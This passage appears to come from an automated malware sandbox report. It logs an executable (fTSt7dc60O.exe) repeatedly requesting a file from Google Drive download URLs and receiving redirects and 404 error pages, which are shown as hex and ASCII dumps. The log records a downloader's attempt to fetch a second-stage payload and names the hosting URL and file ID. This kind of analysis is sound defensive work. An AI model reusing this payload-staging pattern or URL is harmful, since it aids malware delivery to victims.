                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 39 56 4b 4b 37 71 37 41 48 70 56 54 33 4e 52 31 65 6f 45 77 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F9VKK7q7AHpVT3NR1eoEwg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.752227172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:52 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:52 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:52 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-z2LhwlUzTch4ELdEt_ya1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.752228142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:53 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:53 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC42INTQcEMOkPrixOQ1TpM2Q_-W7xSQL9l_8_oNYOQkeKU8tftaJ_OhO9fnoeZBSfRTP0CnQYI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:53 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JElhuqk_mMgbZIpgf4Gk5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 6b 7a 6c 6b 41 46 75 71 45 69 6f 45 73 4f 5a 57 67 69 63 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dkzlkAFuqEioEsOZWgichg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.752229172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:54 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:54 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:54 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-jjiRYZkvH-MsZ2z_GiPmCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.752230142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:55 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:56 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4-Ffjb-ClqqjuqL-ctkK8AL2hXjDna6vXr_CNlT-URa_xi9qLsdfsZNk1W62B93ukubeQN7yU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:55 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-W002gmwOkydt7E2wVEkS3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 49 4a 4e 68 6d 54 33 72 45 39 39 67 6f 49 35 73 77 4a 71 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FIJNhmT3rE99goI5swJqqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.752231172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:56 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:57 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:57 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-c80InAIqdrIRzE5nS5eg3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.752232142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:57 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:58 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR6qA1sjjLWHzUZmSgtHyxUeISbuFVdvKDyrpHt_EdQUc6cpAbYJdZg6V6V86vfC7jyZDvzEpE
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:58 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-R34HUDyU8rT4i4KNzKOzYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 51 35 72 79 51 55 73 56 4b 39 41 45 56 52 35 34 72 2d 57 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Q5ryQUsVK9AEVR54r-W1A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.752233172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:59 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:59 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:59 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-70MP4T_qoe9-yfO1coyLow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.752234142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:00 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
